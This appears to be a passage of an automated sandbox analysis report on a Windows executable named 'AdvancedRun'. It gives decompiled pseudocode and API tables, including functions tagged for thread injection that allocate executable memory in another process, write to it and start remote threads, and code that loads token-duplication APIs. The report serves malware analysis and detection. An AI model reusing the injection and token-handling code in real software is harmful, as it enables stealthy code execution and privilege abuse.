					}
				}
				goto L30;
			}

































                                                                                                                0x0040a474
                                                                                                                0x0040a47b
                                                                                                                0x0040a48a
                                                                                                                0x0040a48d
                                                                                                                0x0040a48f
                                                                                                                0x0040a497
                                                                                                                0x0040a49a
                                                                                                                0x0040a6f7
                                                                                                                0x0040a6f9
                                                                                                                0x0040a700
                                                                                                                0x0040a700
                                                                                                                0x0040a4ad
                                                                                                                0x0040a4b3
                                                                                                                0x0040a4b8
                                                                                                                0x0040a4c6
                                                                                                                0x0040a4cc
                                                                                                                0x0040a4cf
                                                                                                                0x0040a4dd
                                                                                                                0x0040a4e2
                                                                                                                0x0040a4e3
                                                                                                                0x0040a4ea
                                                                                                                0x0040a4e5
                                                                                                                0x0040a4e5
                                                                                                                0x0040a4e5
                                                                                                                0x0040a4ec
                                                                                                                0x0040a4f6
                                                                                                                0x0040a4fe
                                                                                                                0x0040a503
                                                                                                                0x0040a504
                                                                                                                0x0040a50b
                                                                                                                0x0040a506
                                                                                                                0x0040a506
                                                                                                                0x0040a506
                                                                                                                0x0040a50d
                                                                                                                0x0040a512
                                                                                                                0x0040a518
                                                                                                                0x0040a51c
                                                                                                                0x0040a523
                                                                                                                0x0040a523
                                                                                                                0x0040a523
                                                                                                                0x0040a528
                                                                                                                0x0040a537
                                                                                                                0x0040a54c
                                                                                                                0x0040a539
                                                                                                                0x0040a544
                                                                                                                0x0040a549
                                                                                                                0x0040a558
                                                                                                                0x0040a56d
                                                                                                                0x0040a55a
                                                                                                                0x0040a565
                                                                                                                0x0040a56a
                                                                                                                0x0040a579
                                                                                                                0x0040a591
                                                                                                                0x0040a57b
                                                                                                                0x0040a589
                                                                                                                0x0040a58e
                                                                                                                0x0040a5b4
                                                                                                                0x0040a5b7
                                                                                                                0x0040a5cc
                                                                                                                0x0040a5cf
                                                                                                                0x0040a5d4
                                                                                                                0x0040a5d7
                                                                                                                0x0040a6ed
                                                                                                                0x0040a5e5
                                                                                                                0x0040a5fa
                                                                                                                0x0040a60b
                                                                                                                0x0040a61a
                                                                                                                0x0040a620
                                                                                                                0x0040a623
                                                                                                                0x0040a62b
                                                                                                                0x0040a62f
                                                                                                                0x0040a632
                                                                                                                0x0040a659
                                                                                                                0x0040a634
                                                                                                                0x0040a635
                                                                                                                0x0040a641
                                                                                                                0x0040a648
                                                                                                                0x0040a648
                                                                                                                0x0040a668
                                                                                                                0x0040a66e
                                                                                                                0x0040a685
                                                                                                                0x0040a69e
                                                                                                                0x0040a6a8
                                                                                                                0x0040a6ad
                                                                                                                0x0040a6bd
                                                                                                                0x0040a6c5
                                                                                                                0x0040a6c8
                                                                                                                0x0040a6d0
                                                                                                                0x0040a6d1
                                                                                                                0x0040a6d2
                                                                                                                0x0040a6d3
                                                                                                                0x0040a6d3
                                                                                                                0x0040a6c8
                                                                                                                0x0040a6d7
                                                                                                                0x0040a6dc
                                                                                                                0x0040a6dc
                                                                                                                0x0040a6d7
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,00000000,?,00402225,?,00000000,?,?,?,?,?,?), ref: 0040A48F
                                                                                                                • memset.MSVCRT ref: 0040A4B3
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00000000), ref: 0040A4C0
                                                                                                                  • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                                                                  • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                                                                  • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                                                                  • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                                                                  • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CE4
                                                                                                                  • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CF1
                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 0040A4EA
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0040A50B
                                                                                                                • VirtualAllocEx.KERNEL32(?,00000000,00008288,00001000,00000004), ref: 0040A5BA
                                                                                                                • VirtualAllocEx.KERNEL32(?,00000000,00000800,00001000,00000040), ref: 0040A5CF
                                                                                                                • WriteProcessMemory.KERNEL32(?,00000000,0040A3DC,00000800,00000000), ref: 0040A5FA
                                                                                                                • WriteProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A60B
                                                                                                                • ResumeThread.KERNEL32(00000000,?,?,?,?), ref: 0040A635
                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000007D0), ref: 0040A641
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040A648
                                                                                                                • memset.MSVCRT ref: 0040A66E
                                                                                                                • ReadProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A685
                                                                                                                • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A69E
                                                                                                                • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A6A8
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0040A6DC
                                                                                                                • GetLastError.KERNEL32 ref: 0040A6E4
                                                                                                                • GetLastError.KERNEL32(?,00402225,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040A6F1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleProcProcessVirtual$FreeMemoryModule$AllocErrorLastWritememsetstrlen$CloseLibraryObjectOpenReadResumeSingleThreadWait
                                                                                                                • String ID: CreateProcessW$D$GetLastError$kernel32.dll
                                                                                                                • API String ID: 1572607441-20550370
                                                                                                                • Opcode ID: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                                                                • Instruction ID: 438c2ff444ec8f0d87d8749b995af300a635889f814f068fc812e1417cff7fa3
                                                                                                                • Opcode Fuzzy Hash: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                                                                • Instruction Fuzzy Hash: 557127B1800219EFCB109FA0DD8499E7BB5FF08344F14457AF949B6290CB799E90DF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040289F, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 25libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040289F(intOrPtr* __esi) {
				void* _t9;
				struct HINSTANCE__* _t10;
				_Unknown_base(*)()* _t14;

				if( *(__esi + 0x10) == 0) {
					_t10 = LoadLibraryW(L"advapi32.dll");
					 *(__esi + 0x10) = _t10;
					 *((intOrPtr*)(__esi + 0xc)) = GetProcAddress(_t10, "CreateProcessWithLogonW");
					 *((intOrPtr*)(__esi)) = GetProcAddress( *(__esi + 0x10), "CreateProcessWithTokenW");
					 *((intOrPtr*)(__esi + 4)) = GetProcAddress( *(__esi + 0x10), "OpenProcessToken");
					_t14 = GetProcAddress( *(__esi + 0x10), "DuplicateTokenEx");
					 *(__esi + 8) = _t14;
					return _t14;
				}
				return _t9;
			}






                                                                                                                0x004028a3
                                                                                                                0x004028ab
                                                                                                                0x004028bd
                                                                                                                0x004028ca
                                                                                                                0x004028d7
                                                                                                                0x004028e3
                                                                                                                0x004028e6
                                                                                                                0x004028e8
                                                                                                                0x00000000
                                                                                                                0x004028eb
                                                                                                                0x004028ec

                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                                                • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                                                • GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$LibraryLoad
                                                                                                                • String ID: CreateProcessWithLogonW$CreateProcessWithTokenW$DuplicateTokenEx$OpenProcessToken$advapi32.dll
                                                                                                                • API String ID: 2238633743-1970996977
                                                                                                                • Opcode ID: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                                                                • Instruction ID: fe34eb2af2a63a360b7e1287e200b812ce4d940bd8def4616d2569e5b7a8a532
                                                                                                                • Opcode Fuzzy Hash: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                                                                • Instruction Fuzzy Hash: AEF09874A40708EBCB30EFB59D49B07BAF5FB94710B114F2AE49662690D7B8A004CF14
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040A272, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70threadinjectionCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 64%
                                                                                                                			E0040A272(struct HINSTANCE__** __eax, void* _a4, _Unknown_base(*)()* _a8, void* _a12, DWORD* _a16) {
				void* _v8;
				char _v12;
				char* _v20;
				long _v24;
				intOrPtr _v28;
				char* _v36;
				signed int _v40;
				void _v44;
				char _v48;
				char _v52;
				struct _OSVERSIONINFOW _v328;
				void* __esi;
				signed int _t40;
				intOrPtr* _t44;
				void* _t49;
				struct HINSTANCE__** _t54;
				signed int _t55;

				_t54 = __eax;
				_v328.dwOSVersionInfoSize = 0x114;
				GetVersionExW( &_v328);
				if(_v328.dwMajorVersion < 6) {
					return CreateRemoteThread(_a4, 0, 0, _a8, _a12, 4, _a16);
				}
				E0040A1EF(_t54);
				_t44 =  *((intOrPtr*)(_t54 + 4));
				if(_t44 != 0) {
					_t55 = 8;
					memset( &_v44, 0, _t55 << 2);
					_v12 = 0;
					asm("stosd");
					_v36 =  &_v12;
					_v20 =  &_v52;
					_v48 = 0x24;
					_v44 = 0x10003;
					_v40 = _t55;
					_v28 = 0x10004;
					_v24 = 4;
					_a16 = 0;
					_t40 =  *_t44( &_a16, 0x1fffff, 0, _a4, _a8, _a12, 1, 0, 0, 0,  &_v48, _t49);
					asm("sbb eax, eax");
					return  !( ~_t40) & _a16;
				}
				return 0;
			}




















                                                                                                                0x0040a27d
                                                                                                                0x0040a286
                                                                                                                0x0040a290
                                                                                                                0x0040a29d
                                                                                                                0x00000000
                                                                                                                0x0040a32f
                                                                                                                0x0040a29f
                                                                                                                0x0040a2a4
                                                                                                                0x0040a2ad
                                                                                                                0x0040a2b6
                                                                                                                0x0040a2bc
                                                                                                                0x0040a2be
                                                                                                                0x0040a2c4
                                                                                                                0x0040a2c8
                                                                                                                0x0040a2ce
                                                                                                                0x0040a2e3
                                                                                                                0x0040a2ed
                                                                                                                0x0040a2fb
                                                                                                                0x0040a2fe
                                                                                                                0x0040a305
                                                                                                                0x0040a30c
                                                                                                                0x0040a30f
                                                                                                                0x0040a313
                                                                                                                0x00000000
                                                                                                                0x0040a31a
                                                                                                                0x0040a338

                                                                                                                APIs
                                                                                                                • GetVersionExW.KERNEL32(?,74B068A0,00000000), ref: 0040A290
                                                                                                                • CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000004,?), ref: 0040A32F
                                                                                                                  • Part of subcall function 0040A1EF: LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                                                                  • Part of subcall function 0040A1EF: GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressCreateLibraryLoadProcRemoteThreadVersion
                                                                                                                • String ID: $
                                                                                                                • API String ID: 283512611-3993045852
                                                                                                                • Opcode ID: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                                                                • Instruction ID: f7bb912936b7b9019fec647a10c74351ea71fc4cb5320a39ef1905a9d188216f
                                                                                                                • Opcode Fuzzy Hash: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                                                                • Instruction Fuzzy Hash: CC216DB290020DEFDF11CF94DD44AEE7BB9FB88704F00802AFA05B6190D7B59A54CBA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00401093, Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 184COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 85%
                                                                                                                			E00401093(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
				struct tagPOINT _v12;
				void* __esi;
				void* _t47;
				struct HBRUSH__* _t56;
				void* _t61;
				unsigned int _t63;
				void* _t68;
				struct HWND__* _t69;
				struct HWND__* _t70;
				void* _t73;
				unsigned int _t74;
				struct HWND__* _t76;
				struct HWND__* _t77;
				struct HWND__* _t78;
				struct HWND__* _t79;
				unsigned int _t85;
				struct HWND__* _t87;
				struct HWND__* _t89;
				struct HWND__* _t90;
				struct tagPOINT _t96;
				struct tagPOINT _t98;
				signed short _t103;
				void* _t106;
				void* _t117;

				_t106 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t47 = _a4 - 0x110;
				_t117 = __ecx;
				if(_t47 == 0) {
					__eflags =  *0x40feb0;
					if(__eflags != 0) {
						SetDlgItemTextW( *(__ecx + 0x10), 0x3ee, 0x40feb0);
					} else {
						ShowWindow(GetDlgItem( *(__ecx + 0x10), 0x3ed), 0);
						ShowWindow(GetDlgItem( *(_t117 + 0x10), 0x3ee), 0);
					}
					SetWindowTextW( *(_t117 + 0x10), L"AdvancedRun");
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ea, _t117 + 0x40);
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ec, _t117 + 0x23e);
					E0040103E(_t117, __eflags);
					E00404DA9(_t106,  *(_t117 + 0x10), 4);
					goto L30;
				} else {
					_t61 = _t47 - 1;
					if(_t61 == 0) {
						_t103 = _a8;
						_t63 = _t103 >> 0x10;
						__eflags = _t103 - 1;
						if(_t103 == 1) {
							L24:
							__eflags = _t63;
							if(_t63 != 0) {
								goto L30;
							} else {
								EndDialog( *(_t117 + 0x10), _t103 & 0x0000ffff);
								DeleteObject( *(_t117 + 0x43c));
								goto L8;
							}
						} else {
							__eflags = _t103 - 2;
							if(_t103 != 2) {
								goto L30;
							} else {
								goto L24;
							}
						}
					} else {
						_t68 = _t61 - 0x27;
						if(_t68 == 0) {
							_t69 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
							__eflags = _a12 - _t69;
							if(_a12 != _t69) {
								__eflags =  *0x40ff30;
								if( *0x40ff30 == 0) {
									goto L30;
								} else {
									_t70 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
									__eflags = _a12 - _t70;
									if(_a12 != _t70) {
										goto L30;
									} else {
										goto L18;
									}
								}
							} else {
								L18:
								SetBkMode(_a8, 1);
								SetTextColor(_a8, 0xc00000);
								_t56 = GetSysColorBrush(0xf);
							}
						} else {
							_t73 = _t68 - 0xc8;
							if(_t73 == 0) {
								_t74 = _a12;
								_t96 = _t74 & 0x0000ffff;
								_v12.x = _t96;
								_v12.y = _t74 >> 0x10;
								_t76 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
								_push(_v12.y);
								_a8 = _t76;
								_t77 = ChildWindowFromPoint( *(_t117 + 0x10), _t96);
								__eflags = _t77 - _a8;
								if(_t77 != _a8) {
									__eflags =  *0x40ff30;
									if( *0x40ff30 == 0) {
										goto L30;
									} else {
										_t78 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
										_push(_v12.y);
										_t79 = ChildWindowFromPoint( *(_t117 + 0x10), _v12.x);
										__eflags = _t79 - _t78;
										if(_t79 != _t78) {
											goto L30;
										} else {
											goto L13;
										}
									}
								} else {
									L13:
									SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
									goto L8;
								}
							} else {
								if(_t73 != 0) {
									L30:
									_t56 = 0;
									__eflags = 0;
								} else {
									_t85 = _a12;
									_t98 = _t85 & 0x0000ffff;
									_v12.x = _t98;
									_v12.y = _t85 >> 0x10;
									_t87 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
									_push(_v12.y);
									_a8 = _t87;
									if(ChildWindowFromPoint( *(_t117 + 0x10), _t98) != _a8) {
										__eflags =  *0x40ff30;
										if( *0x40ff30 == 0) {
											goto L30;
										} else {
											_t89 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
											_push(_v12.y);
											_t90 = ChildWindowFromPoint( *(_t117 + 0x10), _v12);
											__eflags = _t90 - _t89;
											if(_t90 != _t89) {
												goto L30;
											} else {
												_push(0x40ff30);
												goto L7;
											}
										}
									} else {
										_push(_t117 + 0x23e);
										L7:
										_push( *(_t117 + 0x10));
										E00404F7E();
										L8:
										_t56 = 1;
									}
								}
							}
						}
					}
				}
				return _t56;
			}



























                                                                                                                0x00401093
                                                                                                                0x00401096
                                                                                                                0x00401097
                                                                                                                0x0040109b
                                                                                                                0x004010a3
                                                                                                                0x004010a5
                                                                                                                0x00401270
                                                                                                                0x00401278
                                                                                                                0x004012b3
                                                                                                                0x0040127a
                                                                                                                0x00401293
                                                                                                                0x004012a2
                                                                                                                0x004012a2
                                                                                                                0x004012c1
                                                                                                                0x004012d9
                                                                                                                0x004012ea
                                                                                                                0x004012ec
                                                                                                                0x004012f6
                                                                                                                0x00000000
                                                                                                                0x004010ab
                                                                                                                0x004010ab
                                                                                                                0x004010ac
                                                                                                                0x00401231
                                                                                                                0x00401236
                                                                                                                0x00401239
                                                                                                                0x0040123d
                                                                                                                0x00401249
                                                                                                                0x00401249
                                                                                                                0x0040124c
                                                                                                                0x00000000
                                                                                                                0x00401252
                                                                                                                0x00401259
                                                                                                                0x00401265
                                                                                                                0x00000000
                                                                                                                0x00401265
                                                                                                                0x0040123f
                                                                                                                0x0040123f
                                                                                                                0x00401243
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00401243
                                                                                                                0x004010b2
                                                                                                                0x004010b2
                                                                                                                0x004010b5
                                                                                                                0x004011e1
                                                                                                                0x004011e3
                                                                                                                0x004011e6
                                                                                                                0x0040120e
                                                                                                                0x00401216
                                                                                                                0x00000000
                                                                                                                0x0040121c
                                                                                                                0x00401224
                                                                                                                0x00401226
                                                                                                                0x00401229
                                                                                                                0x00000000
                                                                                                                0x0040122f
                                                                                                                0x00000000
                                                                                                                0x0040122f
                                                                                                                0x00401229
                                                                                                                0x004011e8
                                                                                                                0x004011e8
                                                                                                                0x004011ed
                                                                                                                0x004011fb
                                                                                                                0x00401203
                                                                                                                0x00401203
                                                                                                                0x004010bb
                                                                                                                0x004010bb
                                                                                                                0x004010c0
                                                                                                                0x00401151
                                                                                                                0x0040115a
                                                                                                                0x00401168
                                                                                                                0x0040116b
                                                                                                                0x0040116e
                                                                                                                0x00401170
                                                                                                                0x00401173
                                                                                                                0x00401180
                                                                                                                0x00401182
                                                                                                                0x00401185
                                                                                                                0x004011a4
                                                                                                                0x004011ac
                                                                                                                0x00000000
                                                                                                                0x004011b2
                                                                                                                0x004011ba
                                                                                                                0x004011bc
                                                                                                                0x004011c7
                                                                                                                0x004011c9
                                                                                                                0x004011cb
                                                                                                                0x00000000
                                                                                                                0x004011d1
                                                                                                                0x00000000
                                                                                                                0x004011d1
                                                                                                                0x004011cb
                                                                                                                0x00401187
                                                                                                                0x00401187
                                                                                                                0x00401199
                                                                                                                0x00000000
                                                                                                                0x00401199
                                                                                                                0x004010c6
                                                                                                                0x004010c8
                                                                                                                0x004012fd
                                                                                                                0x004012fd
                                                                                                                0x004012fd
                                                                                                                0x004010ce
                                                                                                                0x004010ce
                                                                                                                0x004010d7
                                                                                                                0x004010e5
                                                                                                                0x004010e8
                                                                                                                0x004010eb
                                                                                                                0x004010ed
                                                                                                                0x004010f0
                                                                                                                0x00401102
                                                                                                                0x0040111d
                                                                                                                0x00401125
                                                                                                                0x00000000
                                                                                                                0x0040112b
                                                                                                                0x00401133
                                                                                                                0x00401135
                                                                                                                0x00401140
                                                                                                                0x00401142
                                                                                                                0x00401144
                                                                                                                0x00000000
                                                                                                                0x0040114a
                                                                                                                0x0040114a
                                                                                                                0x00000000
                                                                                                                0x0040114a
                                                                                                                0x00401144
                                                                                                                0x00401104
                                                                                                                0x0040110a
                                                                                                                0x0040110b
                                                                                                                0x0040110b
                                                                                                                0x0040110e
                                                                                                                0x00401115
                                                                                                                0x00401117
                                                                                                                0x00401117
                                                                                                                0x00401102
                                                                                                                0x004010c8
                                                                                                                0x004010c0
                                                                                                                0x004010b5
                                                                                                                0x004010ac
                                                                                                                0x00401303

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                • String ID: AdvancedRun
                                                                                                                • API String ID: 829165378-481304740
                                                                                                                • Opcode ID: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                                                                • Instruction ID: 224fbb10fd18d8c83ffedf6f1f5ae1765c75c0bde1a98b5884793aa0480d770d
                                                                                                                • Opcode Fuzzy Hash: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                                                                • Instruction Fuzzy Hash: 12517D31510308EBDB216FA0DD84E6A7BB6FB44304F104A3AFA11B65F1CB79A954EB18
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00408ADB, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 216windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 45%
                                                                                                                			E00408ADB(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, void* _a8, unsigned int _a12) {
				void _v259;
				void _v260;
				void _v515;
				void _v516;
				char _v1048;
				void _v1052;
				void _v1056;
				void _v1560;
				long _v1580;
				void _v3626;
				char _v3628;
				void _v5674;
				char _v5676;
				void _v9770;
				short _v9772;
				void* __edi;
				void* _t45;
				void* _t60;
				int _t61;
				int _t63;
				int _t64;
				long _t68;
				struct HWND__* _t94;
				signed int _t103;
				intOrPtr _t127;
				unsigned int _t130;
				void* _t132;
				void* _t135;

				E0040B550(0x2628, __ecx);
				_t45 = _a8 - 0x110;
				if(_t45 == 0) {
					E00404DA9(__edx, _a4, 4);
					_v9772 = 0;
					memset( &_v9770, 0, 0xffe);
					_t103 = 5;
					memcpy( &_v1580, L"{Unknown}", _t103 << 2);
					memset( &_v1560, 0, 0x1f6);
					_v260 = 0;
					memset( &_v259, 0, 0xff);
					_v516 = 0;
					memset( &_v515, 0, 0xff);
					_v5676 = 0;
					memset( &_v5674, 0, 0x7fe);
					_v3628 = 0;
					memset( &_v3626, 0, 0x7fe);
					_t135 = _t132 + 0x5c;
					_t60 = GetCurrentProcess();
					_t105 =  &_v260;
					_a8 = _t60;
					_t61 = ReadProcessMemory(_t60,  *0x40f3bc,  &_v260, 0x80, 0);
					__eflags = _t61;
					if(_t61 != 0) {
						E00404FE0( &_v5676,  &_v260, 4);
						_pop(_t105);
					}
					_t63 = ReadProcessMemory(_a8,  *0x40f3b0,  &_v516, 0x80, 0);
					__eflags = _t63;
					if(_t63 != 0) {
						E00404FE0( &_v3628,  &_v516, 0);
						_pop(_t105);
					}
					_t64 = E00404BD3();
					__eflags = _t64;
					if(_t64 == 0) {
						E004090EE();
					} else {
						E00409172();
					}
					__eflags =  *0x4101b8;
					if(__eflags != 0) {
						L17:
						_v1056 = 0;
						memset( &_v1052, 0, 0x218);
						_t127 =  *0x40f5d4; // 0x0
						_t135 = _t135 + 0xc;
						_t68 = GetCurrentProcessId();
						_push(_t127);
						_push(_t68);
						 *0x40f84c = 0;
						E004092F0(_t105, __eflags);
						__eflags =  *0x40f84c; // 0x0
						if(__eflags != 0) {
							memcpy( &_v1056, 0x40f850, 0x21c);
							_t135 = _t135 + 0xc;
							__eflags =  *0x40f84c; // 0x0
							if(__eflags != 0) {
								wcscpy( &_v1580, E00404B3E( &_v1048));
							}
						}
						goto L20;
					} else {
						__eflags =  *0x4101bc;
						if(__eflags == 0) {
							L20:
							_push( &_v3628);
							_push( &_v5676);
							_push( *0x40f3b0);
							_push( *0x40f3bc);
							_push( *0x40f3ac);
							_push( *0x40f394);
							_push( *0x40f398);
							_push( *0x40f3a0);
							_push( *0x40f3a4);
							_push( *0x40f39c);
							_push( *0x40f3a8);
							_push( &_v1580);
							_push( *0x40f5d4);
							_push( *0x40f5c8);
							_push(L"Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n");
							_push(0x800);
							_push( &_v9772);
							L0040B1EC();
							SetDlgItemTextW(_a4, 0x3ea,  &_v9772);
							SetFocus(GetDlgItem(_a4, 0x3ea));
							L21:
							return 0;
						}
						goto L17;
					}
				}
				if(_t45 == 1) {
					_t130 = _a12;
					if(_t130 >> 0x10 == 0) {
						if(_t130 == 3) {
							_t94 = GetDlgItem(_a4, 0x3ea);
							_a4 = _t94;
							SendMessageW(_t94, 0xb1, 0, 0xffff);
							SendMessageW(_a4, 0x301, 0, 0);
							SendMessageW(_a4, 0xb1, 0, 0);
						}
					}
				}
				goto L21;
			}































                                                                                                                0x00408ae3
                                                                                                                0x00408aeb
                                                                                                                0x00408af3
                                                                                                                0x00408b76
                                                                                                                0x00408b8a
                                                                                                                0x00408b91
                                                                                                                0x00408b98
                                                                                                                0x00408bb1
                                                                                                                0x00408bb3
                                                                                                                0x00408bc6
                                                                                                                0x00408bcc
                                                                                                                0x00408bda
                                                                                                                0x00408be0
                                                                                                                0x00408bf3
                                                                                                                0x00408bfa
                                                                                                                0x00408c0b
                                                                                                                0x00408c12
                                                                                                                0x00408c17
                                                                                                                0x00408c1a
                                                                                                                0x00408c2c
                                                                                                                0x00408c39
                                                                                                                0x00408c3d
                                                                                                                0x00408c3f
                                                                                                                0x00408c41
                                                                                                                0x00408c52
                                                                                                                0x00408c58
                                                                                                                0x00408c58
                                                                                                                0x00408c6f
                                                                                                                0x00408c71
                                                                                                                0x00408c73
                                                                                                                0x00408c83
                                                                                                                0x00408c89
                                                                                                                0x00408c89
                                                                                                                0x00408c8a
                                                                                                                0x00408c8f
                                                                                                                0x00408c91
                                                                                                                0x00408c9a
                                                                                                                0x00408c93
                                                                                                                0x00408c93
                                                                                                                0x00408c93
                                                                                                                0x00408c9f
                                                                                                                0x00408ca5
                                                                                                                0x00408caf
                                                                                                                0x00408cbc
                                                                                                                0x00408cc2
                                                                                                                0x00408cc7
                                                                                                                0x00408ccd
                                                                                                                0x00408cd0
                                                                                                                0x00408cd6
                                                                                                                0x00408cd7
                                                                                                                0x00408cd8
                                                                                                                0x00408cde
                                                                                                                0x00408ce3
                                                                                                                0x00408ceb
                                                                                                                0x00408cfe
                                                                                                                0x00408d03
                                                                                                                0x00408d06
                                                                                                                0x00408d0c
                                                                                                                0x00408d21
                                                                                                                0x00408d27
                                                                                                                0x00408d0c
                                                                                                                0x00000000
                                                                                                                0x00408ca7
                                                                                                                0x00408ca7
                                                                                                                0x00408cad
                                                                                                                0x00408d28
